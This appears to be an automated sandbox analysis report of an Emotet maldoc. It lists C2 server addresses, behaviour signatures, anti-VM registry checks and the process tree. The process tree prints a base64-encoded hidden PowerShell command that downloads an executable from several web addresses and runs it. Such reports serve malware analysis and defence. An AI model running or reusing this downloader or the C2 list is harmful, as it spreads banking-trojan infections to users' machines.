emotet | 5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

General

Target

Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.74
Sample

191212-a6jbr25wd6
SHA256

5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

Score

N/A

Malware Config

Extracted

Family

emotet

C2

190.146.14.143:443

85.235.219.74:80

78.187.204.70:80

46.105.128.215:8080

69.30.205.162:7080

192.161.190.171:8080

163.172.97.112:8080

86.98.157.3:80

113.52.135.33:7080

175.127.140.68:80

212.129.14.27:8080

200.41.121.69:443

143.95.101.72:8080

190.161.67.63:80

50.116.78.109:8080

37.46.129.215:8080

119.57.36.54:8080

212.112.113.235:80

46.105.131.68:8080

1.32.54.12:8080

rsa_pubkey.plain

Signatures

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4872	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4584	Powershell.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	4872	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	4872	WINWORD.EXE

Drops file in system dir 5 IoCs

description	ioc	pid	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	4608	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4608	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4608	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4608	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4608	svchost.exe

Executes dropped EXE 2 IoCs

pid	Process
3560	177.exe
3468	177.exe

Emotet Sync 1 IoCs

trojan banker

description	ioc	pid	Process
Event created	Global\E147BDE4C	3468	177.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4872	WINWORD.EXE
3560	177.exe
3468	177.exe

Drops Office document 4 IoCs

dropper exploiter maldoc

description	ioc	pid	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	4872	WINWORD.EXE
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	4872	WINWORD.EXE
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.74.doc	4872	WINWORD.EXE
File created	C:\Users\Admin\AppData\Local\Temp\~$cs_cc7d6d8e28fce962e81a6ba5c82f29bb.74.doc	4872	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	800	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	800	svchost.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

description	ioc	pid	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"	4752	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"	4752	svchost.exe

Suspicious behavior: EmotetMutantsSpam 1 IoCs

pid	Process
3468	177.exe

emotet family
family emotet

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4872	WINWORD.EXE

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 5096 wrote to memory of 4224	5096	SppExtComObj.exe	74
PID 4584 wrote to memory of 3560	4584	Powershell.exe	85
PID 3560 wrote to memory of 3468	3560	177.exe	86

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	4872	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	4872	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4584	Powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.74.doc" /o ""
1⤵
- Suspicious use of FindShellTrayWindow
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry (likely anti-VM)
PID:4872

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:5096

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABZAGwAcABnAGQAegBtAGIAPQAnAFUAcwBzAGIAYgBtAHoAaAB1AGgAeABrAGUAJwA7ACQATABnAGUAZABrAGsAZABxAHcAIAA9ACAAJwAxADcANwAnADsAJABJAHoAegBxAHoAaABxAHoAdAB5AHoAPQAnAEEAaQBkAHcAagBxAG4AbABjAGoAeABlAGoAJwA7ACQARABiAGIAcwBrAHAAdwBhAHoAdgBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGcAZQBkAGsAawBkAHEAdwArACcALgBlAHgAZQAnADsAJABFAG4AaABsAGsAcABxAG0APQAnAFkAbQBjAHQAaABjAG4AagBrAHUAeQAnADsAJABCAHkAdwB3AG0AegB5AHAAbgBlAD0AJgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMATABJAEUAbgBUADsAJABGAGkAdgBsAHcAbAB6AG8AeQB1AHUAdABsAD0AJwBoAHQAdABwADoALwAvAGEAYwBxAHUAYQAuAHMAbwBsAGEAcgBjAHkAdABlAGMALgBjAG8AbQAvAHIAdABzAGIAZwBzAC8AWABpAFcAbQB0AFkAWQB1AHIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AbABlAGEAcgBuAGMAeQAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AdQBzAGUAcgAvAG8AeABaAHEAUQBwAC8AKgBoAHQAdABwADoALwAvAGgAbwBzAHAAaQB0AGEAbABzAGEAbgByAGEAZgBhAGUAbAAuAGEAaQBuAGkAbQBlAGQAaQBuAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAdwBmAC0AaQA4AGcAZQAtADQANAA0ADUAOQAxADcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGcANwA3ADEALgBrAHcAaQBrAGYAdQBuAG4AZQBsAHMALgBjAG8AbQAvAHAAaABwAG0AeQBhAGQAbQBpAG4AXwBiAGMAawAvAHgAOQB0AGYAbgAtAGwAdgAxAGgANAAtADEANwA0ADEAMgA5ADUAOQA2AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwBpAHkAaQBuAGoAaQBjAGgAYQBuAGcAagBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBXAFkAcwB6AHMAUAAvACcALgAiAFMAYABQAGwASQB0ACIAKAAnACoAJwApADsAJABVAG4AaABjAGcAcQBiAG0AcABmAG0APQAnAFIAbgBmAGgAagB3AGIAaABsACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAgAGkAbgAgACQARgBpAHYAbAB3AGwAegBvAHkAdQB1AHQAbAApAHsAdAByAHkAewAkAEIAeQB3AHcAbQB6AHkAcABuAGUALgAiAEQAbwB3AE4AbABvAGAAQQBkAGYAYABJAEwAZQAiACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAsACAAJABEAGIAYgBzAGsAcAB3AGEAegB2AGYAKQA7ACQAUwB1AGcAawB1AHoAaQBmAGwAeQA9ACcAQwBuAGoAdgBhAGMAaQBnAHEAeQBhAGwAegAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgAyADkAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgB0ACIAKAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApADsAJABDAHIAZwBpAGsAdwBqAGwAawBxAD0AJwBYAGgAagBoAGUAcQBkAHQAegBhAGEAJwA7AGIAcgBlAGEAawA7ACQAVwB2AHQAdQB2AGwAcgB3AD0AJwBUAHMAZQBuAGYAZQB5AGwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBqAGoAcAB0AGcAaQBhAGsAawA9ACcAQgBmAG4AYgBwAHIAcABmAGEAdQBhACcA
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4584

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in system dir
PID:4608

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4300

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
- Checks system information in the registry (likely anti-VM)
PID:800

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Windows security modification
PID:4752

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:4508

C:\Users\Admin\177.exe
"C:\Users\Admin\177.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3560

C:\Users\Admin\177.exe
--653e7fcf
1⤵
- Executes dropped EXE
- Emotet Sync
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

MITRE ATT&CK Additional techniques

T1089

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3468-21-0x0000000000620000-0x0000000000637000-memory.dmp

Filesize
92KB

Download
memory/3468-22-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/3560-19-0x0000000000660000-0x0000000000677000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

MITRE ATT&CK Additional techniques

Replay Monitor

Loading Replay Monitor...

Downloads